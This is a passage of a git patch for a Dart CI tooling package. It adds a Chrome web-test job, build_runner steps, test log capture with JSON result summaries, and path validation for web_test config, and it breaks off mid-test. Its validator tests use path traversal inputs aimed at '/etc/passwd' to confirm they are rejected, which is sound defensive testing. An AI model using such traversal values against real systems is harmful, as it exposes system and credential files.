From d6f11ac99c5f005888a472a0ab991284bb73c8fa Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 17:12:42 -0500 Subject: [PATCH 01/16] feat: add web_test feature, build_runner support, and enhanced managed test - Add `web_test` CI feature: standalone ubuntu job with deterministic Chrome provisioning via browser-actions/setup-chrome@v2, configurable concurrency and optional test path filtering - Enable `build_runner` feature: runs `dart run build_runner build --delete-conflicting-outputs` before analyze/test steps to regenerate .g.dart codegen files - Enhance managed test: pipe test output through tee for log capture, use PIPESTATUS for correct exit codes, upload test logs as artifacts - Add web_test validation (concurrency bounds, path traversal/injection safety checks) with 16 new tests - Document build_runner and web_test features in SETUP.md and USAGE.md - Regenerate CI workflow with all new features Co-Authored-By: Claude Opus 4.6 --- .github/workflows/ci.yaml | 25 +- .runtime_ci/config.json | 3 +- .runtime_ci/template_versions.json | 8 +- SETUP.md | 4 + USAGE.md | 5 + lib/src/cli/manage_cicd.dart | 361 +++++++++++++++++--- lib/src/cli/utils/workflow_generator.dart | 103 ++++++ templates/config.json | 8 +- templates/github/workflows/ci.skeleton.yaml | 128 ++++++- test/workflow_generator_test.dart | 161 ++++++++- 10 files changed, 744 insertions(+), 62 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 480042a..40038b3 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -119,6 +119,9 @@ jobs: env: GIT_LFS_SKIP_SMUDGE: "1" + - name: Run build_runner + run: dart run build_runner build --delete-conflicting-outputs + # ── shared:analysis-cache ── keep in sync with single_platform ── # ── shared:proto-verify ── keep in sync with single_platform ── # ── shared:analyze ── keep in sync with single_platform ── @@ -176,25 +179,35 @@ jobs: env: GIT_LFS_SKIP_SMUDGE: "1" + - name: Run build_runner + run: 
dart run build_runner build --delete-conflicting-outputs + # --- BEGIN USER: pre-test --- # --- END USER: pre-test --- # ── shared:test ── keep in sync with single_platform ── - name: Test - run: dart test + shell: bash + run: | + set -o pipefail + mkdir -p "$RUNNER_TEMP/test-logs" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + exit ${PIPESTATUS[0]} + env: + TEST_LOG_DIR: ${{ runner.temp }}/test-logs - - name: Upload test artifacts on failure - if: failure() + - name: Upload test logs + if: always() uses: actions/upload-artifact@v4 with: - name: test-artifacts-${{ matrix.platform_id }} + name: test-logs-${{ matrix.platform_id }} path: | + ${{ runner.temp }}/test-logs/ test/integration/fixtures/bin/ **/test-results/ - retention-days: 7 + retention-days: 14 # --- BEGIN USER: post-test --- # --- END USER: post-test --- - # --- BEGIN USER: extra-jobs --- # --- END USER: extra-jobs --- diff --git a/.runtime_ci/config.json b/.runtime_ci/config.json index 19e1c65..2251e38 100644 --- a/.runtime_ci/config.json +++ b/.runtime_ci/config.json @@ -73,7 +73,8 @@ "format_check": true, "analysis_cache": false, "managed_analyze": false, - "managed_test": false + "managed_test": true, + "build_runner": true }, "secrets": {}, "sub_packages": [], diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index 5e662f9..4dd8bfe 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-24T20:52:23.005924Z", + "updated_at": "2026-02-24T22:08:51.110199Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,9 +23,9 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "fa46da42c95dd420ebcaa28847ef76e6c5f5e634d9b62ddcfa11da6f561fa1c9", - "consumer_hash": "23ff33976e549dc469e84717d71e5d5ee182999cc000baab85cb7276f3db27d7", - 
"updated_at": "2026-02-24T20:52:23.006744Z" + "hash": "65637b8a60124f7837b7c7b755ef718312054cac6307cf4cb3d646eccac02e6e", + "consumer_hash": "2b0dc631e68ad35000c358bb982f06a9ef5f7a9988581dcf994095ad47fd524d", + "updated_at": "2026-02-24T22:08:51.111054Z" }, "workflow_release": { "hash": "326627cf41fdeb6cd61dae2fda98599d5815a34e63e4a8af1aaa8f7ad18435d3", diff --git a/SETUP.md b/SETUP.md index 0d99b41..1f15342 100644 --- a/SETUP.md +++ b/SETUP.md @@ -312,6 +312,10 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `features.analysis_cache` | bool | `false` | Cache analysis results across runs | | `features.managed_analyze` | bool | `false` | Run `dart analyze` via tooling | | `features.managed_test` | bool | `false` | Run `dart test` via tooling | +| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze/test | +| `features.web_test` | bool | `false` | Add a standalone `web-test` job that runs `dart test -p chrome` on Ubuntu | +| `web_test.concurrency` | int | `1` | Number of concurrent browser test suites | +| `web_test.paths` | list | `[]` | Specific test paths to run (empty = auto-discover all web-compatible tests) | | `platforms` | list | `["ubuntu"]` | Platform matrix. If 2+ entries, CI runs `analyze` once then `test` as a matrix. Valid: `ubuntu-x64`, `ubuntu-arm64`, `macos-arm64`, `macos-x64`, `windows-x64`, `windows-arm64` (plus aliases `ubuntu`, `macos`, `windows`). | | `runner_overrides` | object | `{}` | Override platform IDs to custom `runs-on` labels (e.g. org-managed GitHub-hosted runners). Example: `{ "ubuntu-arm64": "runtime-ubuntu-24.04-arm64-208gb-64core" }` | | `secrets` | object | `{}` | Additional secrets as `{ "ENV_NAME": "SECRET_NAME" }` | diff --git a/USAGE.md b/USAGE.md index bae4485..2190afa 100644 --- a/USAGE.md +++ b/USAGE.md @@ -1249,11 +1249,16 @@ final exists = await commandExists('git'); 4. 
**Multi-platform mode** (`ci.platforms` has 2+ entries): - `analyze` — Run analysis once (Ubuntu) - `test` — Run tests as a matrix across OS+arch (`x64` + `arm64`) +5. Optional `web-test` — If `ci.features.web_test=true`, runs `dart test -p chrome` in a standalone Ubuntu job with deterministic Chrome provisioning via `browser-actions/setup-chrome@v2` **Platform matrix configuration:** - `ci.platforms`: list of platform IDs (e.g. `["ubuntu-x64","ubuntu-arm64","macos-arm64","macos-x64","windows-x64","windows-arm64"]`) - `ci.runner_overrides`: optional map to point platform IDs at custom `runs-on` labels (e.g. org-managed GitHub-hosted runners) +**Optional features:** +- `ci.features.build_runner`: When `true`, runs `dart run build_runner build --delete-conflicting-outputs` before analyze and test steps to regenerate `.g.dart` codegen files +- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via `browser-actions/setup-chrome@v2` and runs `dart test -p chrome`. Configure concurrency and test paths via `ci.web_test.concurrency` (default `1`) and `ci.web_test.paths` (default `[]` = auto-discover) + **Key steps:** ```yaml - run: dart run runtime_ci_tooling:manage_cicd verify-protos diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index e77a8d3..8db2e7e 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -2140,7 +2140,17 @@ ${_artifactLink()} '''); } -/// Run dart test. +/// Run dart test with full output capture (two-layer strategy). +/// +/// Layer 1 — Zone-aware reporters: `--file-reporter json:` captures all +/// `print()` calls as `PrintEvent` objects with test attribution, and +/// `--file-reporter expanded:` captures human-readable output. +/// +/// Layer 2 — Shell-level `tee` (configured in CI template) captures anything +/// that bypasses Dart zones (`stdout.write()`, isolate prints, FFI output). 
+/// +/// All log files are written to [logDir] (`$TEST_LOG_DIR` in CI, or +/// `/.dart_tool/test-logs/` locally). Future _runTest(String repoRoot) async { _header('Running Tests'); @@ -2148,62 +2158,323 @@ Future _runTest(String repoRoot) async { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { _success('No test/ directory found — skipping tests'); - _writeStepSummary(''' -## Test Results - -**No test/ directory found — skipped.** -'''); + _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); return; } - final result = await Process.run('dart', ['test', '--exclude-tags', 'gcp'], workingDirectory: repoRoot); - final output = result.stdout as String; - stdout.write(output); - stderr.write(result.stderr); - // Parse test output for summary (before potential exit) - final passMatch = RegExp(r'(\d+) tests? passed').firstMatch(output); - final failMatch = RegExp(r'(\d+) failed').firstMatch(output); - final skipMatch = RegExp(r'(\d+) skipped').firstMatch(output); - final passed = passMatch?.group(1) ?? '?'; - final failed = failMatch?.group(1) ?? '0'; - final skipped = skipMatch?.group(1) ?? '0'; - - // Truncate output for collapsible (keep last 5000 chars if huge) - final testOutputPreview = output.length > 5000 - ? '... (truncated)\n${output.substring(output.length - 5000)}' - : output; + // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) + final logDir = Platform.environment['TEST_LOG_DIR'] ?? 
'$repoRoot/.dart_tool/test-logs'; + Directory(logDir).createSync(recursive: true); + + final jsonPath = '$logDir/results.json'; + final expandedPath = '$logDir/expanded.txt'; + + // Build test arguments with two file reporters + expanded console output + final testArgs = [ + 'test', + '--exclude-tags', + 'gcp', + '--chain-stack-traces', + '--reporter', + 'expanded', + '--file-reporter', + 'json:$jsonPath', + '--file-reporter', + 'expanded:$expandedPath', + ]; - if (result.exitCode != 0) { - _error('Tests failed (exit code ${result.exitCode})'); - // Write failure summary BEFORE exiting - _writeStepSummary(''' -## Test Results -- FAILED + _info('Log directory: $logDir'); + _info('Running: dart ${testArgs.join(' ')}'); + + // Use Process.start with piped output so we can both stream to console + // AND capture the full output for summary generation. + final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); + + // Stream stdout and stderr to console in real-time while capturing + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + + final stdoutDone = process.stdout.transform(const SystemEncoding().decoder).listen((data) { + stdout.write(data); + stdoutBuf.write(data); + }).asFuture(); + + final stderrDone = process.stderr.transform(const SystemEncoding().decoder).listen((data) { + stderr.write(data); + stderrBuf.write(data); + }).asFuture(); + + // Wait for streams to drain and process to exit (45-min safety timeout) + const processTimeout = Duration(minutes: 45); + final exitCode = await process.exitCode.timeout( + processTimeout, + onTimeout: () { + _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + process.kill(ProcessSignal.sigkill); + return -1; + }, + ); + try { + await Future.wait([stdoutDone, stderrDone]); + } catch (_) { + // Ignore stream errors (e.g. 
process killed before streams drained) + } -| Metric | Count | -|--------|-------| -| Passed | $passed | -| Failed | **$failed** | -| Skipped | $skipped | + // Parse the JSON results file for structured test data + final results = _parseTestResultsJson(jsonPath); -${_collapsible('Test Output', '```\n$testOutputPreview\n```', open: true)} -'''); - exit(result.exitCode); + // Write console output to log file as well (supplements shell-level tee) + File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + } + + // Generate and write the rich job summary + _writeTestJobSummary(results, exitCode, logDir); + + if (exitCode != 0) { + _error('Tests failed (exit code $exitCode)'); + exit(exitCode); } _success('All tests passed'); +} - _writeStepSummary(''' -## Test Results +/// A single test failure with its error, stack trace, and captured print output. +class _TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + _TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} -| Metric | Count | -|--------|-------| -| Passed | **$passed** | -| Failed | $failed | -| Skipped | $skipped | +/// Parsed results from the NDJSON test results file. +class _TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List<_TestFailure> failures = []; + bool parsed = false; +} -**All tests passed.** +/// Parse the NDJSON file produced by `--file-reporter json:`. +/// +/// Each line is a JSON object with a `type` field. 
We track: +/// - `testStart`: register test name, start time, skip status +/// - `testDone`: record result, compute duration +/// - `error`: capture error message + stack trace +/// - `print`: capture print output, attribute to testID +/// - `done`: overall success/failure + total time +_TestResults _parseTestResultsJson(String jsonPath) { + final results = _TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + _warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + // Tracking maps keyed by testID + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + final skippedTests = {}; -${_collapsible('Test Output', '```\n$testOutputPreview\n```')} -'''); + try { + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test != null) { + final id = test['id'] as int; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + // Detect group-level "loading" entries (no real test) + final metadata = test['metadata'] as Map?; + if (metadata != null && metadata['skip'] == true) { + skippedTests[id] = true; + } + } + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? 
false; + + // Skip synthetic/hidden entries (group-level loading events) + if (hidden) break; + + if (skipped || skippedTests[id] == true) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + _TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id] ?? '', + stackTrace: testStackTraces[id] ?? '', + printOutput: testPrints[id]?.toString() ?? '', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + testErrors[id] = event['error'] as String? ?? ''; + testStackTraces[id] = event['stackTrace'] as String? ?? ''; + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } + } catch (e) { + _warn('Failed to parse JSON results: $e'); + } + + return results; +} + +/// Generate a rich GitHub Actions job summary from parsed test results. +void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { + final buf = StringBuffer(); + + // Determine platform identifier for the heading + final platformId = + Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; + + buf.writeln('## Test Results — $platformId\n'); + + if (!results.parsed) { + // Fallback: no JSON file was produced (test binary crashed before writing) + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 
'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.\n'); + buf.writeln('Check the expanded output in test logs for details.\n'); + buf.writeln(_artifactLink(':package: View full test logs')); + _writeStepSummary(buf.toString()); + return; + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + + // Status banner + if (results.failed == 0) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s\n'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed\n'); + } + + // Summary table + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + // Failed test details + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests\n'); + + // Cap at 20 failures to avoid exceeding the 1 MiB summary limit + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln(':x: ${_escapeHtml(f.name)}$durStr\n'); + + if (f.error.isNotEmpty) { + // Truncate very long error messages + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; + buf.writeln('**Error:**'); + buf.writeln('```'); + buf.writeln(error); + buf.writeln('```\n'); + } + + if (f.stackTrace.isNotEmpty) { + // Truncate very long stack traces + final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; + buf.writeln('**Stack Trace:**'); + buf.writeln('```'); + buf.writeln(stack); + buf.writeln('```\n'); + } + + if (f.printOutput.isNotEmpty) { + final printLines = f.printOutput.split('\n'); + final lineCount = printLines.length; + // Truncate captured output if it's very long + final printPreview = f.printOutput.length > 1500 + ? '${f.printOutput.substring(0, 1500)}\n... (truncated)' + : f.printOutput.trimRight(); + buf.writeln('**Captured Output ($lineCount lines):**'); + buf.writeln('```'); + buf.writeln(printPreview); + buf.writeln('```\n'); + } + + buf.writeln('
\n'); + } + + if (results.failures.length > 20) { + buf.writeln( + '_...and ${results.failures.length - 20} more failures. ' + 'See test logs artifact for full details._\n', + ); + } + } + + // Artifact link + buf.writeln('---'); + buf.writeln(_artifactLink(':package: View full test logs')); + buf.writeln(); + + _writeStepSummary(buf.toString()); +} + +/// Escape HTML special characters for safe embedding in GitHub markdown. +String _escapeHtml(String input) { + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>'); } /// Run dart analyze and fail only on actual errors. diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 952bb61..a39def2 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -52,6 +52,7 @@ const Set _knownFeatureKeys = { 'managed_analyze', 'managed_test', 'build_runner', + 'web_test', }; /// Renders CI workflow YAML from a Mustache skeleton template and config.json. 
@@ -177,6 +178,12 @@ class WorkflowGenerator { 'managed_analyze': features['managed_analyze'] == true, 'managed_test': features['managed_test'] == true, 'build_runner': features['build_runner'] == true, + 'web_test': features['web_test'] == true, + + // Web test config (only meaningful when web_test is true) + 'web_test_concurrency': _resolveWebTestConcurrency(ciConfig), + 'web_test_paths': _resolveWebTestPaths(ciConfig), + 'web_test_has_paths': _resolveWebTestHasPaths(ciConfig), // Secrets / env 'has_secrets': secretsList.isNotEmpty, @@ -197,6 +204,39 @@ class WorkflowGenerator { }; } + static String _resolveWebTestConcurrency(Map ciConfig) { + final webTestConfig = ciConfig['web_test']; + if (webTestConfig is Map) { + final concurrency = webTestConfig['concurrency']; + if (concurrency is int && concurrency > 0) { + return '$concurrency'; + } + } + return '1'; + } + + static String _resolveWebTestPaths(Map ciConfig) { + final webTestConfig = ciConfig['web_test']; + if (webTestConfig is Map) { + final paths = webTestConfig['paths']; + if (paths is List && paths.isNotEmpty) { + return paths.whereType().where((s) => s.trim().isNotEmpty).join(' '); + } + } + return ''; + } + + static bool _resolveWebTestHasPaths(Map ciConfig) { + final webTestConfig = ciConfig['web_test']; + if (webTestConfig is Map) { + final paths = webTestConfig['paths']; + if (paths is List && paths.isNotEmpty) { + return paths.whereType().where((s) => s.trim().isNotEmpty).isNotEmpty; + } + } + return false; + } + /// Extract user sections from the existing file and re-insert them /// into the rendered output. /// @@ -391,6 +431,62 @@ class WorkflowGenerator { } } } + + final webTestConfig = ciConfig['web_test']; + if (webTestConfig != null) { + if (webTestConfig is! Map) { + errors.add('ci.web_test must be an object, got ${webTestConfig.runtimeType}'); + } else { + final concurrency = webTestConfig['concurrency']; + if (concurrency != null) { + if (concurrency is! 
int) { + errors.add('ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}'); + } else if (concurrency < 1) { + errors.add('ci.web_test.concurrency must be a positive integer, got $concurrency'); + } + } + + final paths = webTestConfig['paths']; + if (paths != null) { + if (paths is! List) { + errors.add('ci.web_test.paths must be an array, got ${paths.runtimeType}'); + } else { + for (var i = 0; i < paths.length; i++) { + final pathValue = paths[i]; + if (pathValue is! String || pathValue.trim().isEmpty) { + errors.add('ci.web_test.paths[$i] must be a non-empty string'); + continue; + } + if (pathValue != pathValue.trim()) { + errors.add('ci.web_test.paths[$i] must not have leading/trailing whitespace'); + continue; + } + if (pathValue.contains(RegExp(r'[\r\n\t]'))) { + errors.add('ci.web_test.paths[$i] must not contain newlines/tabs'); + continue; + } + if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { + errors.add('ci.web_test.paths[$i] must be a relative repo path'); + continue; + } + if (pathValue.contains('\\')) { + errors.add('ci.web_test.paths[$i] must use forward slashes (/)'); + continue; + } + final normalized = p.posix.normalize(pathValue); + if (normalized.startsWith('..') || normalized.contains('/../')) { + errors.add('ci.web_test.paths[$i] must not traverse outside the repo'); + continue; + } + if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { + errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); + } + } + } + } + } + } + return errors; } @@ -413,6 +509,13 @@ class WorkflowGenerator { Logger.info(' Features: (none)'); } + if (features['web_test'] == true) { + final webTestConfig = ciConfig['web_test'] as Map? ?? {}; + final concurrency = webTestConfig['concurrency'] ?? 1; + final webPaths = webTestConfig['paths'] as List? ?? []; + Logger.info(' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? 
"(all)" : webPaths.join(", ")}'); + } + if (secrets.isNotEmpty) { Logger.info(' Secrets: ${secrets.length} env var(s)'); } diff --git a/templates/config.json b/templates/config.json index 0a971cb..5fa7efc 100644 --- a/templates/config.json +++ b/templates/config.json @@ -73,10 +73,16 @@ "analysis_cache": false, "managed_analyze": false, "managed_test": false, - "build_runner": false + "build_runner": false, + "web_test": false }, "secrets": {}, "sub_packages": [], + "_comment_web_test": "Optional: web_test runs 'dart test -p chrome' in a standalone ubuntu job. Requires 'web_test: true' in features.", + "web_test": { + "concurrency": 1, + "paths": [] + }, "_comment_platforms": "Optional: CI platform matrix. When 2+ entries are provided, CI splits into analyze + matrix test jobs.", "platforms": ["ubuntu-x64", "ubuntu-arm64", "macos-arm64", "macos-x64", "windows-x64", "windows-arm64"], "_comment_runner_overrides": "Optional: override platform IDs to custom runs-on labels (e.g. org-managed GitHub-hosted runners). 
Keys must match ci.platforms entries.", diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index edcb908..b5af516 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -196,12 +196,29 @@ jobs: # ── shared:test ── keep in sync with multi_platform ── <%#managed_test%> - name: Test - run: dart run runtime_ci_tooling:manage_cicd test + shell: bash + run: | + set -o pipefail + mkdir -p "$RUNNER_TEMP/test-logs" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + exit ${PIPESTATUS[0]} + env: + TEST_LOG_DIR: ${{ runner.temp }}/test-logs + + - name: Upload test logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: test-logs-<%runner%> + path: | + ${{ runner.temp }}/test-logs/ + test/integration/fixtures/bin/ + **/test-results/ + retention-days: 14 <%/managed_test%> <%^managed_test%> - name: Test run: dart test -<%/managed_test%> - name: Upload test artifacts on failure if: failure() @@ -212,6 +229,7 @@ jobs: test/integration/fixtures/bin/ **/test-results/ retention-days: 7 +<%/managed_test%> # --- BEGIN USER: post-test --- # --- END USER: post-test --- @@ -393,12 +411,29 @@ jobs: # ── shared:test ── keep in sync with single_platform ── <%#managed_test%> - name: Test - run: dart run runtime_ci_tooling:manage_cicd test + shell: bash + run: | + set -o pipefail + mkdir -p "$RUNNER_TEMP/test-logs" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + exit ${PIPESTATUS[0]} + env: + TEST_LOG_DIR: ${{ runner.temp }}/test-logs + + - name: Upload test logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: test-logs-${{ matrix.platform_id }} + path: | + ${{ runner.temp }}/test-logs/ + test/integration/fixtures/bin/ + **/test-results/ + retention-days: 14 <%/managed_test%> <%^managed_test%> - name: Test run: dart test -<%/managed_test%> - name: Upload test 
artifacts on failure if: failure() @@ -409,10 +444,95 @@ jobs: test/integration/fixtures/bin/ **/test-results/ retention-days: 7 +<%/managed_test%> # --- BEGIN USER: post-test --- # --- END USER: post-test --- <%/multi_platform%> +<%#web_test%> + web-test: + needs: [pre-check<%#format_check%>, auto-format<%/format_check%>] + if: needs.pre-check.outputs.should_run == 'true' + runs-on: ubuntu-latest +<%#has_secrets%> + env: +<%#secrets_list%> + <%env_name%>: ${{ secrets.<%secret_name%> }} +<%/secrets_list%> +<%/has_secrets%> + steps: + - uses: actions/checkout@v6.0.2 + with: +<%#format_check%> + ref: ${{ needs.auto-format.outputs.sha }} +<%/format_check%> + fetch-depth: 1 + persist-credentials: false +<%#lfs%> + lfs: true +<%/lfs%> + + - name: Configure Git for HTTPS with Token + shell: bash + run: | + TOKEN="${{ secrets.<%pat_secret%> || secrets.GITHUB_TOKEN }}" + echo "::add-mask::${TOKEN}" + git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + + - uses: dart-lang/setup-dart@v1.7.1 + with: + sdk: "<%dart_sdk%>" + + - name: Cache Dart pub dependencies + uses: actions/cache@v5.0.3 + with: + path: ~/.pub-cache + key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} + restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- + + - run: dart pub get + env: + GIT_LFS_SKIP_SMUDGE: "1" + +<%#build_runner%> + - name: Run build_runner + run: dart run build_runner build --delete-conflicting-outputs + +<%/build_runner%> + - name: Setup Chrome + id: setup-chrome + uses: browser-actions/setup-chrome@v2 + with: + install-dependencies: true + + - name: 
Verify Chrome + run: ${{ steps.setup-chrome.outputs.chrome-path }} --version + +<%#web_test_has_paths%> + - name: Web Test + run: dart test -p chrome --concurrency=<%web_test_concurrency%> <%web_test_paths%> + env: + CHROME_EXECUTABLE: ${{ steps.setup-chrome.outputs.chrome-path }} +<%/web_test_has_paths%> +<%^web_test_has_paths%> + - name: Web Test + run: dart test -p chrome --concurrency=<%web_test_concurrency%> + env: + CHROME_EXECUTABLE: ${{ steps.setup-chrome.outputs.chrome-path }} +<%/web_test_has_paths%> + + - name: Upload web test artifacts on failure + if: failure() + uses: actions/upload-artifact@v4 + with: + name: web-test-artifacts + path: | + **/test-results/ + retention-days: 7 +<%/web_test%> # --- BEGIN USER: extra-jobs --- # --- END USER: extra-jobs --- diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index 0c95411..4161089 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -15,6 +15,7 @@ Map _validConfig({ dynamic lineLength, List? subPackages, Map? runnerOverrides, + Map? 
webTest, }) { return { 'dart_sdk': dartSdk, @@ -25,6 +26,7 @@ Map _validConfig({ if (lineLength != null) 'line_length': lineLength, if (subPackages != null) 'sub_packages': subPackages, if (runnerOverrides != null) 'runner_overrides': runnerOverrides, + if (webTest != null) 'web_test': webTest, }; } @@ -176,6 +178,7 @@ void main() { 'managed_analyze': true, 'managed_test': false, 'build_runner': true, + 'web_test': true, }, )); expect(errors.where((e) => e.contains('features')), isEmpty); @@ -496,11 +499,166 @@ void main() { }); }); + // ---- web_test ---- + group('web_test', () { + test('non-map web_test produces error', () { + final config = _validConfig(); + config['web_test'] = 'not_a_map'; + final errors = WorkflowGenerator.validate(config); + expect(errors, anyElement(contains('web_test must be an object'))); + }); + + test('null web_test is fine (optional)', () { + final errors = WorkflowGenerator.validate(_validConfig()); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('web_test.concurrency non-int produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 'fast'}), + ); + expect(errors, anyElement(contains('concurrency must be an integer'))); + }); + + test('web_test.concurrency zero produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 0}), + ); + expect(errors, anyElement(contains('positive integer'))); + }); + + test('web_test.concurrency negative produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': -1}), + ); + expect(errors, anyElement(contains('positive integer'))); + }); + + test('web_test.concurrency valid int passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'concurrency': 4}), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('web_test.concurrency null is fine (defaults to 1)', () { + final errors 
= WorkflowGenerator.validate( + _validConfig(webTest: {}), + ); + expect(errors.where((e) => e.contains('concurrency')), isEmpty); + }); + + test('web_test.paths non-list produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'paths': 'not_a_list'}), + ); + expect(errors, anyElement(contains('paths must be an array'))); + }); + + test('web_test.paths with empty string produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [''], + }), + ); + expect(errors, anyElement(contains('must be a non-empty string'))); + }); + + test('web_test.paths with absolute path produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['/etc/passwd'], + }), + ); + expect(errors, anyElement(contains('must be a relative repo path'))); + }); + + test('web_test.paths with traversal produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['../../../etc/passwd'], + }), + ); + expect(errors, anyElement(contains('must not traverse outside the repo'))); + }); + + test('web_test.paths with backslashes produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': 